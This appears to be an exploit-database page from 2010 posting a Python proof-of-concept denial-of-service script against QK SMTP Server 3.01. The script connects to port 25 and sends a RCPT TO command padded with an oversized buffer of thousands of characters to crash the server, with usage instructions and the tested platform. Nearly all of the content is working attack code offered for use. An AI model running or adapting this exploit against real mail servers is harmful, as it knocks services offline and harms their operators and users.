[dos / poc] - QK SMTP Server 3 RCPT TO: Command DoS
Posted on 12 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>QK SMTP Server 3 RCPT TO: Command DoS | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: dos / poc | Exploit author: antrhacks' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>===================================== QK SMTP Server 3 RCPT TO: Command DoS ===================================== # Author: antrhacks # Software Link: http://www.qksoft.com/qk-smtp-server/download.php # Version: 3.01 # Platform: Windows XP SP3 Home edition Fr # Tested with buffersize: 4500, 5000 # Example: ./QKsmtp.py 192.168.0.10 4500 # Nota: Settings > Acces IP Control > Allow your IP #!/usr/bin/python #-------------------------------------------- # QK SMTP Server 3 RCPT TO: Command DoS #-------------------------------------------- # Title: QK SMTP Server 3 RCPT TO: Command DoS # Author: antrhacks # Software Link: http://www.qksoft.com/qk-smtp-server/download.php # Version: 3.01 # Platform: Windows XP SP3 Home edition Fr # Tested with buffersize: 4500, 5000 # Example: ./QKsmtp.py 192.168.0.10 4500 # Nota: Settings > Acces IP Control > Allow your IP import socket import sys def howto(): print ("Usage: scriptname.py <IP> <BufferSize> ") def exploit(host): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((host, 25)) except: print ("Unable to connect to host") sys.exit(1) r=sock.recv(1024) print r r=sock.getsockname() print r sock.send("HELO localhost ") r=sock.recv(1024) print r sock.send("MAIL FROM: hack@hack.com ") r=sock.recv(1024) print r sock.send("RCPT TO: " + buffere + " ") r=sock.recv(1024) print r sock.send("QUIT" + " ") r=sock.recv(1024) print r sock.close() if len(sys.argv) <> 3: howto() sys.exit(1) else: host=sys.argv[1] buffersize=int(sys.argv[2]) buffere= "x41" * buffersize exploit(host) sys.exit(0) # END # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-12]</pre></body></html>
